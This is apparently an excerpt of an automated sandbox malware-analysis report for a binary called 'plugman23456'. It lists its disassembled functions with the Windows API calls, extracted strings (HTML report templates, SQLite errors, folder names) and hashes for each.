                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                          • KillTimer.USER32(?,00000041), ref: 004060D7
                          • KillTimer.USER32(?,00000041), ref: 004060E8
                          • GetTickCount.KERNEL32 ref: 0040610B
                          • GetParent.USER32(?), ref: 00406136
                          • SendMessageW.USER32(00000000), ref: 0040613D
                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                          • String ID: A
                          • API String ID: 2892645895-3554254475
                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                          • GetDesktopWindow.USER32 ref: 0040D9FD
                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                          • memset.MSVCRT ref: 0040DA23
                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                          • String ID: caption
                          • API String ID: 973020956-4135340389
                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf$wcscpy
                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                          • API String ID: 1283228442-2366825230
                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • wcschr.MSVCRT ref: 00413972
                          • wcscpy.MSVCRT ref: 00413982
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          • wcscpy.MSVCRT ref: 004139D1
                          • wcscat.MSVCRT ref: 004139DC
                          • memset.MSVCRT ref: 004139B8
                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                          • memset.MSVCRT ref: 00413A00
                          • memcpy.MSVCRT ref: 00413A1B
                          • wcscat.MSVCRT ref: 00413A27
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                          • String ID: \systemroot
                          • API String ID: 4173585201-1821301763
                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy
                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                          • API String ID: 1284135714-318151290
                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                          • String ID: 0$6
                          • API String ID: 4066108131-3849865405
                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004082EF
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memset.MSVCRT ref: 00408362
                          • memset.MSVCRT ref: 00408377
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiWide
                          • String ID:
                          • API String ID: 290601579-0
                          • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                          • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memchrmemset
                          • String ID: PD$PD
                          • API String ID: 1581201632-2312785699
                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                          • GetDC.USER32(00000000), ref: 00409F6E
                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                          • GetParent.USER32(?), ref: 00409FA5
                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                          • String ID:
                          • API String ID: 2163313125-0
                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$wcslen
                          • String ID:
                          • API String ID: 239872665-3916222277
                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$_snwprintfmemset
                          • String ID: %s (%s)$YV@
                          • API String ID: 3979103747-598926743
                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                          • wcslen.MSVCRT ref: 0040A6B1
                          • wcscpy.MSVCRT ref: 0040A6C1
                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                          • wcscpy.MSVCRT ref: 0040A6DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                          • String ID: Unknown Error$netmsg.dll
                          • API String ID: 2767993716-572158859
                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 0040DAFB
                          • wcscpy.MSVCRT ref: 0040DB0B
                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfilewcscpy$AttributesFileString
                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                          • API String ID: 3176057301-2039793938
                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • unable to open database: %s, xrefs: 0042F84E
                          • out of memory, xrefs: 0042F865
                          • cannot ATTACH database within transaction, xrefs: 0042F663
                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                          • too many attached databases - max %d, xrefs: 0042F64D
                          • database %s is already in use, xrefs: 0042F6C5
                          • database is already attached, xrefs: 0042F721
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                          • memcpy.MSVCRT ref: 0040EB80
                          • memcpy.MSVCRT ref: 0040EB94
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                          • String ID: ($d
                          • API String ID: 1140211610-1915259565
                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                          Download Yara Rule
                          APIs
                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                          • Sleep.KERNEL32(00000001), ref: 004178E9
                          • GetLastError.KERNEL32 ref: 004178FB
                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockSleepUnlock
                          • String ID:
                          • API String ID: 3015003838-0
                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00407E44
                          • memset.MSVCRT ref: 00407E5B
                          • _mbscpy.MSVCRT ref: 00407E7E
                          • _mbscpy.MSVCRT ref: 00407ED7
                          • _mbscpy.MSVCRT ref: 00407EEE
                          • _mbscpy.MSVCRT ref: 00407F01
                          • wcscpy.MSVCRT ref: 00407F10
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                          • String ID:
                          • API String ID: 59245283-0
                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                          • GetLastError.KERNEL32 ref: 0041855C
                          • Sleep.KERNEL32(00000064), ref: 00418571
                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                          • GetLastError.KERNEL32 ref: 0041858E
                          • Sleep.KERNEL32(00000064), ref: 004185A3
                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                          • String ID:
                          • API String ID: 3467550082-0
                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                          • API String ID: 3510742995-3273207271
                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                          • memset.MSVCRT ref: 00413ADC
                          • memset.MSVCRT ref: 00413AEC
                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                          • memset.MSVCRT ref: 00413BD7
                          • wcscpy.MSVCRT ref: 00413BF8
                          • CloseHandle.KERNEL32(?), ref: 00413C4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                          • String ID: 3A
                          • API String ID: 3300951397-293699754
                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00411AF6
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 00411B14
                          • wcscat.MSVCRT ref: 00411B2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileModuleNamememsetwcscatwcsrchr
                          • String ID: AE$.cfg$General$EA
                          • API String ID: 776488737-1622828088
                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
